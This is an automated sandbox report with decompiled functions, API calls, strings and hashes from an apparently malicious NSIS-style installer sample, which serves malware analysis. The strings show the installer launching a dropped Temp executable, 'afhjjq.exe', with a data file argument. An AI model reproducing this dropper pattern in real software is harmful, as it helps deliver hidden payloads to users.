                            • Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
                            • Opcode Fuzzy Hash: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                            • Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00404F7F(struct HWND__* _a4, intOrPtr _a8) {
                            				long _v8;
                            				signed char _v12;
                            				unsigned int _v16;
                            				void* _v20;
                            				intOrPtr _v24;
                            				long _v56;
                            				void* _v60;
                            				long _t15;
                            				unsigned int _t19;
                            				signed int _t25;
                            				struct HWND__* _t28;
                            
                            				_t28 = _a4;
                            				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                            				if(_a8 == 0) {
                            					L4:
                            					_v56 = _t15;
                            					_v60 = 4;
                            					SendMessageW(_t28, 0x113e, 0,  &_v60);
                            					return _v24;
                            				}
                            				_t19 = GetMessagePos();
                            				_v16 = _t19 >> 0x10;
                            				_v20 = _t19;
                            				ScreenToClient(_t28,  &_v20);
                            				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                            				if((_v12 & 0x00000066) != 0) {
                            					_t15 = _v8;
                            					goto L4;
                            				}
                            				return _t25 | 0xffffffff;
                            			}















                            APIs
                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
                            • GetMessagePos.USER32 ref: 00404FA2
                            • ScreenToClient.USER32 ref: 00404FBC
                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: Message$Send$ClientScreen
                            • String ID: f
                            • API String ID: 41195575-1993550816
                            • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                            • Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
                            • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                            • Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
                            				short _v132;
                            				void* _t11;
                            				WCHAR* _t19;
                            
                            				if(_a8 == 0x110) {
                            					SetTimer(_a4, 1, 0xfa, 0);
                            					_a8 = 0x113;
                            				}
                            				if(_a8 == 0x113) {
                            					_t11 = E00403012();
                            					_t19 = L"unpacking data: %d%%";
                            					if( *0x42a270 == 0) {
                            						_t19 = L"verifying installer: %d%%";
                            					}
                            					wsprintfW( &_v132, _t19, _t11);
                            					SetWindowTextW(_a4,  &_v132);
                            					SetDlgItemTextW(_a4, 0x406,  &_v132);
                            				}
                            				return 0;
                            			}







                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: Text$ItemTimerWindowwsprintf
                            • String ID: unpacking data: %d%%$verifying installer: %d%%
                            • API String ID: 1451636040-1158693248
                            • Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                            • Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
                            • Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                            • Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 93%
                            			E00402950(void* __ebx) {
                            				WCHAR* _t26;
                            				void* _t29;
                            				long _t37;
                            				void* _t49;
                            				void* _t52;
                            				void* _t54;
                            				void* _t56;
                            				void* _t59;
                            				void* _t60;
                            				void* _t61;
                            
                            				_t49 = __ebx;
                            				_t52 = 0xfffffd66;
                            				_t26 = E00402DA6(0xfffffff0);
                            				_t55 = _t26;
                            				 *(_t61 - 0x40) = _t26;
                            				if(E00405FAE(_t26) == 0) {
                            					E00402DA6(0xffffffed);
                            				}
                            				E00406133(_t55);
                            				_t29 = E00406158(_t55, 0x40000000, 2);
                            				 *(_t61 + 8) = _t29;
                            				if(_t29 != 0xffffffff) {
                            					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
                            					if( *(_t61 - 0x28) != _t49) {
                            						_t37 =  *0x42a274;
                            						 *(_t61 - 0x44) = _t37;
                            						_t54 = GlobalAlloc(0x40, _t37);
                            						if(_t54 != _t49) {
                            							E004035F8(_t49);
                            							E004035E2(_t54,  *(_t61 - 0x44));
                            							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
                            							 *(_t61 - 0x10) = _t59;
                            							if(_t59 != _t49) {
                            								E00403371(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
                            								while( *_t59 != _t49) {
                            									_t51 =  *_t59;
                            									_t60 = _t59 + 8;
                            									 *(_t61 - 0x3c) =  *_t59;
                            									E00406113( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                            									_t59 = _t60 +  *(_t61 - 0x3c);
                            								}
                            								GlobalFree( *(_t61 - 0x10));
                            							}
                            							E0040620A( *(_t61 + 8), _t54,  *(_t61 - 0x44));
                            							GlobalFree(_t54);
                            							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
                            						}
                            					}
                            					_t52 = E00403371(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
                            					CloseHandle( *(_t61 + 8));
                            				}
                            				_t56 = 0xfffffff3;
                            				if(_t52 < _t49) {
                            					_t56 = 0xffffffef;
                            					DeleteFileW( *(_t61 - 0x40));
                            					 *((intOrPtr*)(_t61 - 4)) = 1;
                            				}
                            				_push(_t56);
                            				E00401423();
                            				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t61 - 4));
                            				return 0;
                            			}














                            APIs
                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                            • GlobalFree.KERNEL32 ref: 00402A06
                            • GlobalFree.KERNEL32 ref: 00402A19
                            • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                            • String ID:
                            • API String ID: 2667972263-0
                            • Opcode ID: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                            • Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
                            • Opcode Fuzzy Hash: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                            • Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 77%
                            			E00404E71(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                            				char _v68;
                            				char _v132;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t23;
                            				signed int _t24;
                            				void* _t31;
                            				void* _t33;
                            				void* _t34;
                            				void* _t44;
                            				signed int _t46;
                            				signed int _t50;
                            				signed int _t52;
                            				signed int _t53;
                            				signed int _t55;
                            
                            				_t23 = _a16;
                            				_t53 = _a12;
                            				_t44 = 0xffffffdc;
                            				if(_t23 == 0) {
                            					_push(0x14);
                            					_pop(0);
                            					_t24 = _t53;
                            					if(_t53 < 0x100000) {
                            						_push(0xa);
                            						_pop(0);
                            						_t44 = 0xffffffdd;
                            					}
                            					if(_t53 < 0x400) {
                            						_t44 = 0xffffffde;
                            					}
                            					if(_t53 < 0xffff3333) {
                            						_t52 = 0x14;
                            						asm("cdq");
                            						_t24 = 1 / _t52 + _t53;
                            					}
                            					_t25 = _t24 & 0x00ffffff;
                            					_t55 = _t24 >> 0;
                            					_t46 = 0xa;
                            					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                            				} else {
                            					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                            					_t50 = 0;
                            				}
                            				_t31 = E004066A5(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                            				_t33 = E004066A5(_t44, _t50, _t55,  &_v132, _t44);
                            				_t34 = E004066A5(_t44, _t50, 0x423748, 0x423748, _a8);
                            				wsprintfW(_t34 + lstrlenW(0x423748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                            				return SetDlgItemTextW( *0x429238, _a4, 0x423748);
                            			}




















                            APIs
                            • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                            • wsprintfW.USER32 ref: 00404F1B
                            • SetDlgItemTextW.USER32 ref: 00404F2E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: ItemTextlstrlenwsprintf
                            • String ID: %u.%u%s%s$H7B
                            • API String ID: 3540041739-107966168
                            • Opcode ID: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                            • Instruction ID: 20619224473e8c08b4fba53027c62ddcf1c3fef784a2ba69f514aa474de30786
                            • Opcode Fuzzy Hash: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                            • Instruction Fuzzy Hash: 1A11D8736041283BDB00A5ADDC45E9F3298AB81338F150637FA26F61D1EA79882182E8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 48%
                            			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                            				void* _v8;
                            				int _v12;
                            				short _v536;
                            				void* _t27;
                            				signed int _t33;
                            				intOrPtr* _t35;
                            				signed int _t45;
                            				signed int _t46;
                            				signed int _t47;
                            
                            				_t46 = _a12;
                            				_t47 = _t46 & 0x00000300;
                            				_t45 = _t46 & 0x00000001;
                            				_t27 = E004064D5(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                            				if(_t27 == 0) {
                            					if((_a12 & 0x00000002) == 0) {
                            						L3:
                            						_push(0x105);
                            						_push( &_v536);
                            						_push(0);
                            						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                            							__eflags = _t45;
                            							if(__eflags != 0) {
                            								L10:
                            								RegCloseKey(_v8);
                            								return 0x3eb;
                            							}
                            							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
                            							__eflags = _t33;
                            							if(_t33 != 0) {
                            								break;
                            							}
                            							_push(0x105);
                            							_push( &_v536);
                            							_push(_t45);
                            						}
                            						RegCloseKey(_v8);
                            						_t35 = E00406A35(3);
                            						if(_t35 != 0) {
                            							return  *_t35(_a4, _a8, _t47, 0);
                            						}
                            						return RegDeleteKeyW(_a4, _a8);
                            					}
                            					_v12 = 0;
                            					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                            						goto L10;
                            					}
                            					goto L3;
                            				}
                            				return _t27;
                            			}













                            APIs
                            • RegEnumValueW.ADVAPI32 ref: 00402EFD
                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: CloseEnum$DeleteValue
                            • String ID:
                            • API String ID: 1354259210-0
                            • Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                            • Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
                            • Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                            • Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 77%
                            			E00401D81(void* __ebx, void* __edx) {
                            				struct HWND__* _t30;
                            				WCHAR* _t38;
                            				void* _t48;
                            				void* _t53;
                            				signed int _t55;
                            				signed int _t60;
                            				long _t63;
                            				void* _t65;
                            
                            				_t53 = __ebx;
                            				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                            					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                            				} else {
                            					E00402D84(2);
                            					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                            				}
                            				_t55 =  *(_t65 - 0x24);
                            				 *(_t65 + 8) = _t30;
                            				_t60 = _t55 & 0x00000004;
                            				 *(_t65 - 0x38) = _t55 & 0x00000003;
                            				 *(_t65 - 0x18) = _t55 >> 0x1f;
                            				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                            				if((_t55 & 0x00010000) == 0) {
                            					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                            				} else {
                            					_t38 = E00402DA6(0x11);
                            				}
                            				 *(_t65 - 0x44) = _t38;
                            				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                            				asm("sbb esi, esi");
                            				_t63 = LoadImageW( ~_t60 &  *0x42a260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
                            				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                            				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                            					DeleteObject(_t48);
                            				}
                            				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                            					_push(_t63);
                            					E004065AF();
                            				}
                            				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t65 - 4));
                            				return 0;
                            			}












                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                            • String ID:
                            • API String ID: 1849352358-0
                            • Opcode ID: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                            • Instruction ID: 4d725fdcf847a80329c23b38d7164c003567f542edd6fcacfb34c9ebeef40da9
                            • Opcode Fuzzy Hash: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                            • Instruction Fuzzy Hash: 67212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389951DB98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 73%
                            			E00401E4E(intOrPtr __edx) {
                            				void* __edi;
                            				int _t9;
                            				signed char _t15;
                            				struct HFONT__* _t18;
                            				intOrPtr _t30;
                            				void* _t31;
                            				struct HDC__* _t33;
                            				void* _t35;
                            
                            				_t30 = __edx;
                            				_t33 = GetDC( *(_t35 - 8));
                            				_t9 = E00402D84(2);
                            				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                            				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                            				ReleaseDC( *(_t35 - 8), _t33);
                            				 *0x40ce08 = E00402D84(3);
                            				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                            				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                            				 *0x40ce0f = 1;
                            				 *0x40ce0c = _t15 & 0x00000001;
                            				 *0x40ce0d = _t15 & 0x00000002;
                            				 *0x40ce0e = _t15 & 0x00000004;
                            				E004066A5(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
                            				_t18 = CreateFontIndirectW(0x40cdf8);
                            				_push(_t18);
                            				_push(_t31);
                            				E004065AF();
                            				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
                            				return 0;
                            			}












                            APIs
                            • GetDC.USER32(?), ref: 00401E51
                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                            • ReleaseDC.USER32 ref: 00401E84
                              • Part of subcall function 004066A5: lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                              • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                            • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                            • String ID:
                            • API String ID: 2584051700-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 59%
                            			E00401C43(intOrPtr __edx) {
                            				int _t29;
                            				long _t30;
                            				signed int _t32;
                            				WCHAR* _t35;
                            				long _t36;
                            				int _t41;
                            				signed int _t42;
                            				int _t46;
                            				int _t56;
                            				intOrPtr _t57;
                            				struct HWND__* _t63;
                            				void* _t64;
                            
                            				_t57 = __edx;
                            				_t29 = E00402D84(3);
                            				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                            				 *(_t64 - 0x18) = _t29;
                            				_t30 = E00402D84(4);
                            				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                            				 *(_t64 + 8) = _t30;
                            				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                            					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
                            				}
                            				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                            				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                            					 *(_t64 + 8) = E00402DA6(0x44);
                            				}
                            				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                            				_push(1);
                            				if(__eflags != 0) {
                            					_t61 = E00402DA6();
                            					_t32 = E00402DA6();
                            					asm("sbb ecx, ecx");
                            					asm("sbb eax, eax");
                            					_t35 =  ~( *_t31) & _t61;
                            					__eflags = _t35;
                            					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                            					goto L10;
                            				} else {
                            					_t63 = E00402D84();
                            					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                            					_t41 = E00402D84(2);
                            					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                            					_t56 =  *(_t64 - 0x1c) >> 2;
                            					if(__eflags == 0) {
                            						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                            						L10:
                            						 *(_t64 - 0x38) = _t36;
                            					} else {
                            						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                            						asm("sbb eax, eax");
                            						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                            					}
                            				}
                            				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
                            				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                            					_push( *(_t64 - 0x38));
                            					E004065AF();
                            				}
                            				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t64 - 4));
                            				return 0;
                            			}
















                            APIs
                            • SendMessageTimeoutW.USER32 ref: 00401CB3
                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: MessageSend$Timeout
                            • String ID: !
                            • API String ID: 1777923405-2657877971
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 91%
                            			E00406536(void* __ecx, void* __eflags, char _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                            				int _v8;
                            				long _t21;
                            				long _t24;
                            				char* _t30;
                            
                            				asm("sbb eax, eax");
                            				_v8 = 0x800;
                            				_t5 =  &_a4; // 0x422728
                            				_t21 = E004064D5(__eflags,  *_t5, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                            				_t30 = _a16;
                            				if(_t21 != 0) {
                            					L4:
                            					 *_t30 =  *_t30 & 0x00000000;
                            				} else {
                            					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                            					_t21 = RegCloseKey(_a20);
                            					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                            					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                            						goto L4;
                            					}
                            				}
                            				return _t21;
                            			}








                            APIs
                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,0040A230,00000000,('B,00000000,?,?,"C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq,?,?,0040679D,80000002), ref: 0040657C
                            • RegCloseKey.ADVAPI32(?,?,0040679D,80000002,Software\Microsoft\Windows\CurrentVersion,"C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq,"C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq,"C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq,00000000,00422728), ref: 00406587
                            Strings
                            • ('B, xrefs: 0040655B
                            • "C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq, xrefs: 0040653D
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: CloseQueryValue
                            • String ID: "C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq$('B
                            • API String ID: 3356406503-1563722736
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 58%
                            			E00405F37(WCHAR* _a4) {
                            				WCHAR* _t9;
                            
                            				_t9 = _a4;
                            				_push( &(_t9[lstrlenW(_t9)]));
                            				_push(_t9);
                            				if( *(CharPrevW()) != 0x5c) {
                            					lstrcatW(_t9, 0x40a014);
                            				}
                            				return _t9;
                            			}





                            APIs
                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F3D
                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F47
                            • lstrcatW.KERNEL32(?,0040A014), ref: 00405F59
                            Strings
                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F37
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: CharPrevlstrcatlstrlen
                            • String ID: C:\Users\user\AppData\Local\Temp\
                            • API String ID: 2659869361-823278215
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 89%
                            			E0040563E(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                            				int _t15;
                            				long _t16;
                            
                            				_t15 = _a8;
                            				if(_t15 != 0x102) {
                            					if(_t15 != 0x200) {
                            						_t16 = _a16;
                            						L7:
                            						if(_t15 == 0x419 &&  *0x423734 != _t16) {
                            							_push(_t16);
                            							_push(6);
                            							 *0x423734 = _t16;
                            							E00404FFF();
                            						}
                            						L11:
                            						return CallWindowProcW( *0x42373c, _a4, _t15, _a12, _t16);
                            					}
                            					if(IsWindowVisible(_a4) == 0) {
                            						L10:
                            						_t16 = _a16;
                            						goto L11;
                            					}
                            					_t16 = E00404F7F(_a4, 1);
                            					_t15 = 0x419;
                            					goto L7;
                            				}
                            				if(_a12 != 0x20) {
                            					goto L10;
                            				}
                            				E00404610(0x413);
                            				return 0;
                            			}






                            APIs
                            • IsWindowVisible.USER32 ref: 0040566D
                            • CallWindowProcW.USER32(?,?,?,?), ref: 004056BE
                              • Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: Window$CallMessageProcSendVisible
                            • String ID:
                            • API String ID: 3748168415-3916222277
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E004060BD(void* __ecx, CHAR* _a4, CHAR* _a8) {
                            				int _v8;
                            				int _t12;
                            				int _t14;
                            				int _t15;
                            				CHAR* _t17;
                            				CHAR* _t27;
                            
                            				_t12 = lstrlenA(_a8);
                            				_t27 = _a4;
                            				_v8 = _t12;
                            				while(lstrlenA(_t27) >= _v8) {
                            					_t14 = _v8;
                            					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                            					_t15 = lstrcmpiA(_t27, _a8);
                            					_t27[_v8] =  *(_t14 + _t27);
                            					if(_t15 == 0) {
                            						_t17 = _t27;
                            					} else {
                            						_t27 = CharNextA(_t27);
                            						continue;
                            					}
                            					L5:
                            					return _t17;
                            				}
                            				_t17 = 0;
                            				goto L5;
                            			}










                            APIs
                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                            • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E5
                            • CharNextA.USER32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060F6
